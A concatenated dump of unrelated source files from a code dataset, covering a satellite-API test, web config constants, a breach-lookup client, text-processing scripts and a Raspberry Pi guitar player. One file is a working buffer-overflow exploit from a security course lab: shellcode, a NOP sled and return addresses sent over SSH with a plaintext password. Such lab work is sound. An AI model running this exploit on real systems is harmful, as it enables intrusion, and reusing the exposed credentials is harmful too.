length(i)\n if l > maxl:\n n = i\n maxl = l\nprint(n)\n","sub_path":"problem 014/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"153219022","text":"#!/usr/bin/env python2\n\nfrom pwn import *\n\ncontext.terminal = ['tmux', 'splitw', '-v']\ncontext.update(arch='i386', os='linux')\n\nlocal_dbg = 0xffffcd50\nlocal = local_dbg+0x100\n\nserver_dbg = 0xffffd550\nserver = server_dbg+0x100\n\nstart_addr = server_dbg\n\nshellcode = shellcraft.cat(\"/proc/flag\")\npayload = cyclic(cyclic_find(0x61616167))\nfor i in range (0, 1):\n payload += p32(server)\npayload += \"\\x90\"*2000\npayload += asm(shellcode)\nfor i in range (0, 200):\n payload += p32(server)\n\n# connect to our server\ns = ssh(\"lab03\", \"52.201.10.159\", password=\"b50e289f\")# invoke a process in the server\np = s.process(\"./crackme0x00\", cwd=\"/home/lab03/tut03-pwntool\")\n\n# Local\n#p = process(\"./crackme0x00\", cwd=\"/home/jakeholl/git/cs6265/lab03/tut03-pwntool\")\n\n# Local debug\n#p = gdb.debug(\"./crackme0x00\", ''' continue ''')\n\np.sendline(payload)\np.interactive()\n","sub_path":"cs6265/lab03/tut03-pwntool/exploit4.py","file_name":"exploit4.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"354516109","text":"\"\"\"\nA module that tests an interface for Sentinel Hub Batch processing\n\"\"\"\nimport datetime as dt\nimport itertools as it\n\nfrom sentinelhub import SentinelHubBatch, SentinelHubRequest, DataCollection, BBox, CRS, MimeType\n\n\ndef test_iter_tiling_grids(config):\n tiling_grids = list(SentinelHubBatch.iter_tiling_grids(config=config))\n\n assert len(tiling_grids) >= 1\n assert all(isinstance(item, dict) for item in tiling_grids)\n\n\ndef test_single_tiling_grid(config):\n tiling_grid = SentinelHubBatch.get_tiling_grid(0, config=config)\n\n assert isinstance(tiling_grid, dict)\n\n\ndef test_create_and_run_batch_request(config, requests_mock):\n \"\"\" A test that mocks creation and execution of a new batch request\n \"\"\"\n evalscript = 'some evalscript'\n time_interval = dt.date(year=2020, month=6, day=1), dt.date(year=2020, month=6, day=10)\n bbox = BBox([14.0, 45.8, 14.2, 46.0], crs=CRS.WGS84)\n sentinelhub_request = SentinelHubRequest(\n evalscript=evalscript,\n input_data=[\n SentinelHubRequest.input_data(\n data_collection=DataCollection.SENTINEL2_L1C,\n time_interval=time_interval,\n )\n ],\n responses=[\n SentinelHubRequest.output_response('B02', MimeType.TIFF),\n ],\n bbox=bbox,\n config=config\n )\n\n requests_mock.post('/oauth/token', real_http=True)\n request_id = 'mocked-id'\n requests_mock.post('/api/v1/batch/process', [{\n 'json': {\n 'id': request_id,\n 'processRequest': {\n 'input': {\n 'bounds': {\n 'bbox': list(bbox),\n 'properties': {\n 'crs': 'http://www.opengis.net/def/crs/OGC/1.3/CRS84'\n }\n }\n }\n }\n }\n }])\n\n batch_request = SentinelHubBatch.create(\n sentinelhub_request,\n tiling_grid=SentinelHubBatch.tiling_grid(\n grid_id=1000,\n resolution=10,\n buffer=(50, 50)\n ),\n bucket_name='test',\n description='Test batch job',\n config=config\n )\n\n assert isinstance(batch_request, SentinelHubBatch)\n assert batch_request.request_id == request_id\n assert batch_request.info['id'] == request_id\n assert request_id in repr(batch_request)\n assert batch_request.bbox == bbox\n\n delete_endpoint = f'/api/v1/batch/process/{request_id}'\n requests_mock.delete(delete_endpoint, [{'json': ''}])\n\n batch_request.delete()\n requests_mock.request_history[-1].url.endswith(delete_endpoint)\n\n endpoints = ['analyse', 'start', 'cancel', 'restartpartial']\n full_endpoints = [f'/api/v1/batch/process/{request_id}/{endpoint}' for endpoint in endpoints]\n for full_endpoint in full_endpoints:\n requests_mock.post(full_endpoint, [{'json': ''}])\n\n batch_request.start_analysis()\n batch_request.start_job()\n batch_request.cancel_job()\n batch_request.restart_job()\n\n for index, full_endpoint in enumerate(full_endpoints):\n assert requests_mock.request_history[index - len(full_endpoints)].url.endswith(full_endpoint)\n\n\ndef test_iter_requests(config):\n batch_requests = list(it.islice(SentinelHubBatch.iter_requests(config=config), 10))\n assert all(isinstance(request, SentinelHubBatch) for request in batch_requests)\n\n if batch_requests:\n latest_request = SentinelHubBatch.get_latest_request(config=config)\n assert isinstance(latest_request, SentinelHubBatch)\n assert all(latest_request.info['created'] >= request.info['created'] for request in batch_requests)\n","sub_path":"tests/test_sentinelhub_batch.py","file_name":"test_sentinelhub_batch.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"31625449","text":"from traffgroup.core.X import XEnum\n\nDEFAULT_DOMAIN = 'traffgroup.com'\n\nclass CReservedSites(XEnum):\n '''Technology site IDs reserved for internal usage (i.e. justice, juidgement, apocalypse, collapsing)'''\n def __init__(self):\n XEnum.__init__(self)\n self.ACCOUNTS = 1\n self.BILLING = 2\n self.PARTNERSHIP = 3\n self.SUPPORT = 4\n self.TRAC = 5\n self.STATIC = [6, 7]\n self.CORE = 8\n self.CONTENT = [6, 7]\n self.XSTATIC = 9\n self.DEFAULT_PAYSITE = 52\n self.RESERVED9 = 10\n\n_X__ReservedSites = CReservedSites()\n\n\nclass _AccountsExternalGlobals(XEnum):\n def __init__(self):\n XEnum.__init__(self)\n self.ROOT = \"http://acc.traffgroup.com/\"\n self.BASE = \"http://acc.traffgroup.com/external\"\n self.LOGIN = lambda method : self.BASE + \"/login/\" + method\n self.LOGOUT = self.BASE + \"/logout\"\n self.REGISTER = self.BASE + \"/register\"\n self.RECOVER = lambda method : self.BASE + \"/recover/\" + method\n self.VERIFY = lambda method : self.BASE + \"/verify/\" + method\n\n\nclass _AccountsGlobals(XEnum):\n def __init__(self):\n XEnum.__init__(self)\n self.BASE = \"http://acc.traffgroup.com\"\n self.LOGINFORM = self.BASE + \"/login/loginform\"\n self.LOGIN = self.BASE + \"/login/login\"\n self.LOGOUT = self.BASE + \"/login/logout\"\n self.REGISTRATION = self.BASE + \"/registration/regform\"\n self.EXTERNAL = _AccountsExternalGlobals()\n self.CAPTCHA = self.BASE + \"/captcha\"\n self.HOST = 'acc.traffgroup.com'\n\n\nclass _Billing_Globals(XEnum):\n def __init__(self):\n XEnum.__init__(self)\n self.URI = \"http://newbill.\"\n self.HOST = \"http://newbill.traffgroup.com\"\n self.CHECKOUT = self.URI + \"checkout/index/\"\n self.CHECKOUT_FRAME = self.URI + \"checkout/frame/\"\n# self.SUBSCRIPTION = lambda x: 'http://127.0.0.1:8087'\n self.SUBSCRIPTION = lambda domain: (self.URI + domain) \\\n if not domain.startswith('127.0.0.1') else self.URI + DEFAULT_DOMAIN\n \nclass _StaticGlobals(XEnum):\n def __init__(self, id, domain, site_id):\n XEnum.__init__(self)\n self.BASE = \"http://\" + domain #\"http://static\" + ((\"%.2d\" % id) if id is not None else \"\") + \".\" + domain\n self.SITE_ID = site_id\n self.PROMO = self.BASE + \"/promo\"\n self.JS = self.BASE + \"/static/js\"\n self.CSS = self.BASE + \"/css\"\n self.IMG = self.BASE + \"/img\"\n self.SWF = self.BASE + \"/swf\"\n self.BIN = self.BASE + \"/bin\"\n self.TEMPLATES = self.BASE + \"/templates\"\n self.PROFILES = self.BASE + \"/profiles/social\"\n self.THEMES = self.BASE + \"/css/themes\"\n self.SITE = lambda x: self.BASE + \"/site/\" + (\"%.2d\" % x)\n\n self.CONTENT_BASE = \"http://static\" + ((\"%.2d\" % id) if id is not None else \"\") + \".\" + domain\n self.CONTENT = self.CONTENT_BASE + \"/content\"\n self.CONTENT_PROTECTED = self.CONTENT_BASE + \"/protected\"\n self.CONTENT_MEMBER = self.CONTENT_BASE + \"/members\"\n self.CONTENT_THUMBS = self.CONTENT_BASE + \"/thumbs\"\n\nclass CSiteGlobals(XEnum):\n def __init__(self):\n XEnum.__init__(self)\n self.ACCOUNTS = _AccountsGlobals()\n self.STATIC = [_StaticGlobals(x + 1, \"static.traffgroup.com\",\n _X__ReservedSites.STATIC[x]) for x in range(len(_X__ReservedSites.STATIC))] + \\\n [_StaticGlobals(1, \"127.0.0.1\", 11)]\n self.XSTATIC = _StaticGlobals(None, \"xbasis.org\", _X__ReservedSites.XSTATIC)\n self.CONTENT = dict([(s.SITE_ID, s) for s in self.STATIC])\n self.BILLING = _Billing_Globals()\n self.WIKI = \"http://wiki.xbasis.org/awmpartners\"\n self.SALT = u'cM?%tgfK9.je'\n","sub_path":"traffgroup/core/model/siteglobals.py","file_name":"siteglobals.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"77379000","text":"import requests\n\n\n\nURL = \"https://haveibeenpwned.com/api/v3/breaches?domain=linkedin.com\"\n\n# parses the list of breaches\ndef parse_breaches(breaches):\n\tfor breach in breaches:\n\t\tprint(f'Breached domain: {breach[\"Domain\"]} on {breach[\"BreachDate\"]}')\n\t\tprint(\"The following information was stolen: \")\n\t\tfor info in breach[\"DataClasses\"]:\n\t\t\tprint(f\"\\t- {info}\")\n\ndef main():\n\tresponse = requests.get(URL)\n\tparse_breaches(response.json())\n\t\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Python/REST/rest_client.py","file_name":"rest_client.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"595081355","text":"import pickle\nfrom itertools import product\nfrom collections import defaultdict\nstopwords = {\"अंदर\", \"अत\", \"अदि\", \"अप\", \"अपना\", \"अपनि\", \"अपनी\", \"अपने\", \"अभि\", \"अभी\", \"आदि\", \"आप\", \"इंहिं\", \"इंहें\", \"इंहों\", \"इतयादि\", \"इत्यादि\", \"इन\", \"इनका\", \"इन्हीं\", \"इन्हें\", \"इन्हों\", \"इस\", \"इसका\", \"इसकि\", \"इसकी\", \"इसके\", \"इसमें\", \"इसि\", \"इसी\", \"इसे\", \"उंहिं\", \"उंहें\", \"उंहों\", \"उन\", \"उनका\", \"उनकि\", \"उनकी\", \"उनके\", \"उनको\", \"उन्हीं\", \"उन्हें\", \"उन्हों\", \"उस\", \"उसके\", \"उसि\", \"उसी\", \"उसे\", \"एक\", \"एवं\", \"एस\", \"एसे\", \"ऐसे\", \"ओर\", \"और\", \"कइ\", \"कई\", \"कर\", \"करता\", \"करते\", \"करना\", \"करने\", \"करें\", \"कहते\", \"कहा\", \"का\", \"काफि\", \"काफ़ी\", \"कि\", \"किंहें\", \"किंहों\", \"कितना\", \"किन्हें\", \"किन्हों\", \"किया\", \"किर\", \"किस\", \"किसि\", \"किसी\", \"किसे\", \"की\", \"कुछ\", \"कुल\", \"के\", \"को\", \"कोइ\", \"कोई\", \"कोन\", \"कोनसा\", \"कौन\", \"कौनसा\", \"गया\", \"घर\", \"जब\", \"जहाँ\", \"जहां\", \"जा\", \"जिंहें\", \"जिंहों\", \"जितना\", \"जिधर\", \"जिन\", \"जिन्हें\", \"जिन्हों\", \"जिस\", \"जिसे\", \"जीधर\", \"जेसा\", \"जेसे\",\n \"जैसा\", \"जैसे\", \"जो\", \"तक\", \"तब\", \"तरह\", \"तिंहें\", \"तिंहों\", \"तिन\", \"तिन्हें\", \"तिन्हों\", \"तिस\", \"तिसे\", \"तो\", \"था\", \"थि\", \"थी\", \"थे\", \"दबारा\", \"दवारा\", \"दिया\", \"दुसरा\", \"दुसरे\", \"दूसरे\", \"दो\", \"द्वारा\", \"न\", \"नहिं\", \"नहीं\", \"ना\", \"निचे\", \"निहायत\", \"नीचे\", \"ने\", \"पर\", \"पहले\", \"पुरा\", \"पूरा\", \"पे\", \"फिर\", \"बनि\", \"बनी\", \"बहि\", \"बही\", \"बहुत\", \"बाद\", \"बाला\", \"बिलकुल\", \"भि\", \"भितर\", \"भी\", \"भीतर\", \"मगर\", \"मानो\", \"मे\", \"में\", \"यदि\", \"यह\", \"यहाँ\", \"यहां\", \"यहि\", \"यही\", \"या\", \"यिह\", \"ये\", \"रखें\", \"रवासा\", \"रहा\", \"रहे\", \"ऱ्वासा\", \"लिए\", \"लिये\", \"लेकिन\", \"व\", \"वगेरह\", \"वरग\", \"वर्ग\", \"वह\", \"वहाँ\", \"वहां\", \"वहिं\", \"वहीं\", \"वाले\", \"वुह\", \"वे\", \"वग़ैरह\", \"संग\", \"सकता\", \"सकते\", \"सबसे\", \"सभि\", \"सभी\", \"साथ\", \"साबुत\", \"साभ\", \"सारा\", \"से\", \"सो\", \"हि\", \"ही\", \"हुअ\", \"हुआ\", \"हुइ\", \"हुई\", \"हुए\", \"हे\", \"हें\", \"है\", \"हैं\", \"हो\", \"होता\", \"होति\", \"होती\", \"होते\", \"होना\", \"होने\"}\nhindi_doc = open('input.txt', 'r').readlines()\nsentences = []\n\n\ndef get_rhyme_score(pair):\n word1 = pair[0]\n word2 = pair[1]\n i = len(word1)-1\n j = len(word2)-1\n count = 0\n while(word1[i] == word2[j] and i >= 0 and j >= 0):\n i -= 1\n j -= 1\n count += 1\n return count\n\n\ndef get_synonyms(word):\n word2Synset = pickle.load(\n open(\"python-hindi-wordnet/hindi_wordnet_python/WordSynsetDict.pk\", 'rb'))\n synonyms = pickle.load(\n open(\"python-hindi-wordnet/hindi_wordnet_python/SynsetWords.pk\", 'rb'))\n # word = word.decode('utf-8', 'ignore')\n if word in word2Synset:\n synsets = word2Synset[word]\n for pos in synsets.keys():\n for synset in synsets[pos]:\n if synset in synonyms:\n return synonyms[synset]['1']\n\n\nif __name__ == \"__main__\":\n synlists = []\n for sentence in hindi_doc:\n sentlist = []\n sentences.append(sentence.strip().split(' '))\n for words in sentence.strip().split(' '):\n if words not in stopwords:\n synwords = get_synonyms(words)\n if synwords is None:\n sentlist.append([words])\n else:\n sentlist.append(synwords)\n\n else:\n sentlist.append(None)\n synlists.append(sentlist)\n print(synlists)\n rhyming_score = defaultdict(int)\n rhyming_words = defaultdict()\n print(len(synlists[0]))\n print(len(synlists[1]))\n for i in range(len(synlists[0])):\n if synlists[0][i] is None:\n continue\n print(synlists[0][i])\n for j in range(len(synlists[1])):\n if synlists[1][j] is None:\n continue\n print(synlists[1][j])\n cart_p = product(synlists[0][i], synlists[1][j])\n for tpl in cart_p:\n score = get_rhyme_score(tpl)\n if score > rhyming_score[(i, j)]:\n rhyming_score[(i, j)] = score\n rhyming_words[(i, j)] = tpl\n print(rhyming_words)\n keymax = max(rhyming_words, key=rhyming_score.get)\n sentences[0][keymax[0]] = rhyming_words[keymax][0]\n sentences[1][keymax[1]] = rhyming_words[keymax][1]\n print(sentences)\n","sub_path":"Honours/parse_sentence.py","file_name":"parse_sentence.py","file_ext":"py","file_size_in_byte":5710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"547188161","text":"def process_sample(file):\n lines = file.readlines()\n lines = [x.strip() for x in lines]\n return lines\n\ndef get_common_lines(lines):\n for first in lines:\n for second in lines:\n if first != second:\n\n diff_count = 0\n for letter_a, letter_b in zip(first, second):\n if letter_a != letter_b:\n diff_count += 1\n\n if diff_count <= 1:\n return ''.join([x for x in first if x in first and x in second])\n\n return \"\"\n\nsample = open(\"02-sample.txt\", \"r\")\nlines = process_sample(sample)\nprint(get_common_lines(lines))\n","sub_path":"02b.py","file_name":"02b.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"565300480","text":"import pandas as pd\r\nimport os\r\n#import difflib\r\n\r\ndirectory = r'C:\\Users\\aarus\\Documents\\STEM2SHTEM\\canonical25mers'\r\nref_directory = r'C:\\Users\\aarus\\Documents\\STEM2SHTEM\\canonical25mers\\EPI_ISL_402124.fa'\r\nfasta_directory = r'C:\\Users\\aarus\\Documents\\STEM2SHTEM\\fasta_files'\r\n\r\nwith open(ref_directory, \"r\") as ref_file:\r\n ref_distinct = len(list(ref_file)[::2])\r\n\r\nfor filename in os.listdir(directory):\r\n if (filename == \"EPI_ISL_402124.fa\"):\r\n continue\r\n else:\r\n print(filename)\r\n with open(os.path.join(directory, filename), \"r\") as n_file:\r\n num_distinct = len(list(n_file)[::2])\r\n print(num_distinct-ref_distinct)\r\n\r\n\r\n#df = pd.DataFrame(data = [countries, states, dates], columns=[\"Countries\", \"Region/State/Province\", \"Date Reported\"])\r\n#df.to_csv(\"kmer_differences.csv\")\r\n\r\n\r\n\r\n","sub_path":"CountandDistances/distinct_k-mer_differences.py","file_name":"distinct_k-mer_differences.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"195717372","text":"import re\n\nfrom models.tag import Tag\nfrom models.word import Word\n\n\ndef word_list(text):\n ignored = {\"the\", \"and\", \"but\", \"its\", \"than\", \"was\", \"their\"}\n wlist = re.findall(r\"\\b[a-z]{3,30}\\b\", text.lower())\n wlist = [w for w in wlist if w not in ignored]\n return wlist\n\n\ndef tag_info(user_qa, normalize=True):\n tags = dict()\n total_rep = 0\n for qa in user_qa:\n for t in qa[0][\"tags\"]:\n info = tags.get(t, Tag(t))\n info.count += 1\n rep = qa[1][\"score\"] * 10 + (qa[1][\"is_accepted\"] and 15 or 0)\n info.reputation += rep\n total_rep += rep\n tags[t] = info\n if normalize:\n for k in tags:\n tags[k].reputation /= total_rep\n return tags\n\n\ndef word_info(questions, normalize=True):\n words = dict()\n total_f = 0\n for q in questions:\n wlist = word_list(q[\"body\"])\n for w in wlist:\n word = words.get(w, Word(w, 0, set()))\n word.tags |= set(q[\"tags\"])\n word.frequency += 1\n words[w] = word\n total_f += 1\n if normalize:\n for k in words:\n words[k].frequency /= total_f\n return words\n\n\ndef word_expected_reputation(w, word_info, tag_info):\n word = word_info.get(w, Word(w, 1, set()))\n w_freq = word.frequency\n w_tag_factor = sum(tag_info[x].ratio() for x in word.tags)\n w_factor = w_freq * w_tag_factor\n return w_factor\n\n\ndef question_expected_reputation(question, word_info, tag_info):\n wlist = word_list(question[\"body\"])\n rep = sum(tag_info[x].ratio() for x in question[\"tags\"] if x in tag_info)\n for w in wlist:\n rep += word_expected_reputation(w, word_info, tag_info)\n return rep\n","sub_path":"tools/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"7954899","text":"#Author: Isaac Morales\n# This is a prettier version of my original code for playing the guitar using\n#the raspberry pi.\n#!/usr/bin/env python\n\nimport array as ar\nimport time\nimport mido\nfrom mido import MidiFile\nfrom ComboClass import guitar\n\ndef menu():\n print('Welcome! please select where to start')\n print('1. Start from MIDI file ')\n print('2. Start from text file')\n choice = input(':)\\n')\n return int(choice)\n\n #This function turns the MIDI file into a text file\ndef MIDItoTxt(fname):\n paper = open(fname + \".txt\", \"w+\")\n for message in MidiFile(fname +'.mid').play():\n # time.sleep(message.time)\n if not message.is_meta:\n oof = str(message)\n paper.write(oof + '\\n')\n else:\n continue\n paper.close()\n return True\n\n#Read new text file\ndef ReadIt(fname):\n paper = open(fname + '.txt',)\n term0 = 'note_on'\n term1 = 'note_off'\n term2 = 'note='\n term3 = 'time='\n noteStatus = []\n note = []\n timeDelay = []\n if paper.mode == 'r':\n message = paper.read()\n words = message.split()\n for i in words:\n if term0 in i: #note_on\n noteStatus.append(i)\n elif term1 in i: #note_off\n noteStatus.append(i)\n elif term2 in i: #note=\n note.append(i)\n elif term3 in i: #time=\n timeDelay.append(i)\n else:\n continue\n noteCount = len(note)\n timeCount = len(timeDelay)\n if timeCount > noteCount:\n del timeDelay[timeCount-1]\n else:\n continue\n paper.close()\n # combine both arrays for the Midi values when on\n MidiNotes = []\n count = 0\n # print(len(timeDelay)) #number of time delays\n # print(len(note)) #number of notes\n for j in range(len(timeDelay)):\n print( noteStatus[j],timeDelay[j])\n\n sel = input('on or off? \\n')\n\n for i in range(len(timeDelay)):\n if sel == 'on':\n if term0 in noteStatus[i]:\n temp = note[i].split(term2,2)[1]\n temp2 = timeDelay[i].split(term3,2)[1]\n MidiNotes.append([int(temp),float(temp2)]) #We kinda snapped with this sis\n count +=1\n else:\n continue\n elif sel == 'off':\n if term1 in noteStatus[i]:\n temp = note[i].split(term2,2)[1]\n temp2 = timeDelay[i].split(term3,2)[1]\n MidiNotes.append([int(temp),float(temp2)]) #We kinda snapped with this sis\n count +=1\n else:\n continue\n\n # print(count)\n print('Midi notes and their time delays for this song no modifications:\\n',MidiNotes)\n return MidiNotes\n\ndef Open(MidiNotes,notePos,strings):\n StringE4 = []\n StringB3 = []\n StringG3 = []\n StringD2 = []\n StringA2 = []\n StringE2 = []\n for i in range(len(MidiNotes)):\n if MidiNotes[i][0] <=71 and MidiNotes[i][0] >= 66: #E4\n # index, note, string as string, finger flag, string as number, time delay of note\n StringE4.append([i,MidiNotes[i][0],'StringE4',0,0,MidiNotes[i][1]])\n MidiNotes[i][0] = 64\n # StringE4.append(64)\n elif MidiNotes[i][0] <= 65 and MidiNotes[i][0] >= 60: #B3\n StringB3.append([i,MidiNotes[i][0],'StringB3',0,1,MidiNotes[i][1]])\n MidiNotes[i][0] = 59\n # StringB3.append(59)\n elif MidiNotes[i][0] <= 59 and MidiNotes[i][0] >= 55: #G3\n StringG3.append([i,MidiNotes[i][0],'StringG3',0,2,MidiNotes[i][1]])\n MidiNotes[i][0] = 55\n # StringG3.append(55)\n elif MidiNotes[i][0] <= 54 and MidiNotes[i][0] >= 50: #D2\n StringD2.append([i,MidiNotes[i][0],'StringD2',0,3,MidiNotes[i][1]])\n MidiNotes[i][0] = 50\n # StringD2.append(50)\n elif MidiNotes[i][0] <= 49 and MidiNotes[i][0] >=45: #A2\n StringA2.append([i,MidiNotes[i][0],'StringA2',0,4,MidiNotes[i][1]])\n MidiNotes[i][0] =45\n # StringA2.append(45)\n elif MidiNotes[i][0] <=44 and MidiNotes[i][0] >=40: #E2\n StringE2.append([i,MidiNotes[i][0],'StringE2',0,5,MidiNotes[i][1]]) #index,note,string, flag\n MidiNotes[i][0] = 40\n # StringE2.append(40)\n else:\n continue\n # print(MidiNotes)\n strings.append(StringE4) #string 0\n strings.append(StringB3) #string 1\n strings.append(StringG3) #string 2\n strings.append(StringD2) #string 3\n strings.append(StringA2) #string 4\n strings.append(StringE2) #string 5\n # print('all 6 strings and the list of notes on each one ft. their index: \\n',strings)\n print('-----------------------------------------')\n print('String 0 ranged 66 to 71: \\n ',StringE4)\n print('-----------------------------------------')\n print('String 1 ranged 60 to 65: \\n ',StringB3)\n print('-----------------------------------------')\n print('String 2 ranged 55 to 59: \\n ',StringG3)\n print('-----------------------------------------')\n print('String 3 ranged 50 to 54: \\n ',StringD2)\n print('-----------------------------------------')\n print('String 4 ranged 45 to 49: \\n ',StringA2)\n print('-----------------------------------------')\n print('String 5 ranged 40 to 44: \\n ',StringE2)\n print('-----------------------------------------')\n # print(strings[0][0][0]) #[open string][index of info in list][member of 2D info] //0 = index , 1 = Note\n # print(len(strings[1]))\n # print(strings[2][1][2])\n return (MidiNotes,strings)\n\ndef Dictionary(notePos):\n #Dictionary full of steps and notes\n fname1 ='noteSteps'\n paper = open(fname1 + '.txt','r')\n if paper.mode == 'r':\n Notes = paper.readlines()\n Notes = [i.split('\\n',2)[0]for i in Notes]\n NoteVals = [i.split('\\t',2)[0]for i in Notes]\n StepPos = [i.split('\\t',2)[1]for i in Notes]\n for x,y in zip(NoteVals, StepPos):\n notePos[x] = y\n # for x,y in notePos.items():\n # print(x,y)\n\n paper.close()\n return notePos\n\ndef Preview(MidiNotes,strings,notePos,pls):\n OpenStrings = [[0,'E4',1,64],[1,'B3',2,59],[2,'G3',3,55],[3,'D2',4,50],[4,'A2',5,45],[5,'E2',6,40]]\n pluck = ar.array('B',(False for v in range(0,len(OpenStrings)))) #since the picks are backwards now this may flop but idk\n if pls < len(MidiNotes):\n i = pls\n for i in range(len(MidiNotes)): #for evey note in the song\n for string in range(len(strings)): #on ever string\n stringLen = len(strings[string])\n for n in range(stringLen): #for every note on that string\n if strings[string][n][0] == i: #index of the notes have been spread thru out strings\n if n>0: #not the first note on the string\n print('--------------------------------------------------------------------------')\n print(i,' note: ',strings[string][n][1] )\n print('index of previous note on this string: ',strings[string][n-1][0])\n # print('steps from the end: ',notePos[str(strings[string][n-1][1])])\n print('index of current note on this string: ',strings[string][n][0])\n # print('steps from the end: ',notePos[str(strings[string][n][1])])\n difference = int(strings[string][n-1][1])- int(strings[string][n][1]) #distance b/w curent note on string and prev note on string\n direction = 2 if difference > 0 else 1 #if pos: move fwd, neg: back\n difference = abs(difference)\n\n strings[string][n][3] = 1 #flag indicating current pos of finger\n\n for b in range(len(strings)): #check each string\n changeLen = len(strings[b])\n for note in range(changeLen): #check every note that is on that string\n if int(strings[b][note][3]) == 1 and b < string: #explain this sis... #index,note,string, flag,string\n # print(strings[b][note][1],'-',strings[string][n][1])\n check = int(strings[b][note][1]) - int(strings[string][n][1]) #EX: i,MidiNotes[i][0],'StringA2',0,4\n print(check) #difference b/w current pos of stepper on a lower string and current note\n # print(b, 'out of ', string)\n print('index of note on string: ',note)\n print('Difference in question: ', difference)\n print('what we could change it to: ',check)\n if check < (difference-1) and check >=0: #that -1 is a bandaid that idk what to replace with\n # print('in change loop: ',strings[b][note][3])\n # print(i,strings[b][note][2])\n print('Original: index: ',strings[string][n][0],' note: ',strings[string][n][1],'string:',\n strings[string][n][2],' finger pos: ',strings[string][n][3],'string:',strings[string][n][4])\n\n strings[string][n][0] = i #same index\n strings[string][n][2] = strings[b][note][2] #give it a new string\n strings[string][n][3] = strings[b][note][3] #give it a new flag\n strings[string][n][4] = strings[b][note][4] #give it a new string numerically\n\n newPlacement = [strings[string][n][0],strings[string][n][1],strings[string][n][2],\n strings[string][n][3],strings[string][n][4],strings[string][n][5]]\n\n MidiNotes[i][0] = MidiNotes[n][0] #reassign Midi Note(slowly weeding this out)\n MidiNotes[i][1] = MidiNotes[n][1]\n\n print('string: ',b,'note:',note,' of: ',changeLen)\n #insert newPLacement into the appropriate string. look for the correct position and move it there\n for q in range(len(strings)):\n tempLen =len(strings[q])\n for t in range(tempLen): #fits within two values we'll use the index of the\n if len(strings[q])>0 and q 0) and (t<(len(strings[q])-1))) and (strings[q][t+1][0] > strings[b][note][0]) and\n (strings[q][t-1][0] < strings[b][note][0]) and (int(strings[q][t][4]) == int(strings[b][note][4])) and\n (int(strings[b][note-1][3]) ==0)): # and (q 0:\n if strings[string][n][4] is OpenStrings[x][0]: #play, ft not a single use of MidiNote list\n if pluck[x] == False:\n pluck[x] = True\n elif pluck[x] == True:\n pluck[x] = False\n else:\n continue\n print('play ' + OpenStrings[x][1],'pick', pluck[x])\n strings[string][n-1][3] = 0;\n # GPIO.output(OpenStrings[n][2],pluck[n])\n print('time delay: ', strings[x][n][5]) #added the time delays to strings\n # time.sleep(MidiNotes[i][1])\n else:\n continue\n else:\n print('--------------------------------------------------------------------------')\n print('since this is the first note played on this string, move to its distance') #will def be changing considering we might start with open notes\n print(i,' note: ',strings[string][n][1] )\n usable = int(strings[string][n][1])-int(OpenStrings[string][3])\n difference = int(notePos[str(usable)]) #move to note we need\n print('move Stepper on string ',string,' aka ',OpenStrings[string][1],'\\t',difference,' steps')\n for x in range(len(OpenStrings)):\n if len(strings[x])> 0:\n if strings[string][n][4] == OpenStrings[x][0]:\n if pluck[x] == False:\n pluck[x] = True\n elif pluck[x] == True:\n pluck[x] = False\n else:\n continue\n print('play ' + OpenStrings[x][1],'pick pos', pluck[x])\n strings[string][n-1][3] = 0;\n # GPIO.output(OpenStrings[n][2],pluck[n])\n print('time delay: ',strings[x][n][5])\n # time.sleep(MidiNotes[i][1])\n else:\n continue\n else:\n for f in range(len(strings)): #if we make it to the end with no recursion, skedaddle\n print('String:',f,strings[f])\n return strings\n\ndef LetsPlay(MidiNotes,strings,notePos):\n\n # picks = guitar([2])\n S0 = guitar([1,1,2,3,0])\n S1 = guitar([1,4,5,6,1])\n S2 = guitar([1,7,8,9,2])\n S3 = guitar([1,10,11,12,3])\n S4 = guitar([1,13,14,15,4])\n S5 = guitar([2,9,10,11,5])\n\n OpenStrings = [[0,'E4',1,64],[1,'B3',2,59],[2,'G3',3,55],[3,'D2',4,50],[4,'A2',5,45],[5,'E2',6,40]]\n pluck = ar.array('B',(False for v in range(0,len(OpenStrings))))\n for i in range(len(MidiNotes)):\n for string in range(len(strings)):\n for n in range(len(strings[string])):\n if int(strings[string][n][0]) == i:\n if n>0:\n prevPos = int(strings[string][n-1][1])-int(OpenStrings[string][3])\n currPos = int(strings[string][n][1])-int(OpenStrings[string][3])\n\n difference = int(notePos[str(prevPos)])- int(notePos[str(currPos)])\n\n direction = 2 if difference > 0 else 1\n difference = abs(difference)\n print('--------------------------------------------------------------------------')\n print(i,' note: ',strings[string][n][1] )\n print('index of previous note on this string: ',strings[string][n-1][0])\n print('steps from the end: ',notePos[str(prevPos)])\n print('index of current note on this string: ',strings[string][n][0])\n print('steps from the end: ',notePos[str(currPos)])\n print(prevPos, '-', currPos)\n print(direction)\n strings[string][n][3]=1\n\n # subThis = 0\n if strings[string][n][4] == 0: #E4\n done = S0.step(difference,direction)\n elif strings[string][n][4] == 1: #B3\n done = S1.step(difference,direction)\n elif strings[string][n][4] == 2: #G3\n done = S2.step(difference,direction)\n elif strings[string][n][4] == 3: #D2\n done = S3.step(difference,direction)\n elif strings[string][n][4] == 4: #A2\n done = S4.step(difference,direction)\n elif strings[string][n][4] == 5: #E2\n done = S5.step(difference,direction)\n else:\n 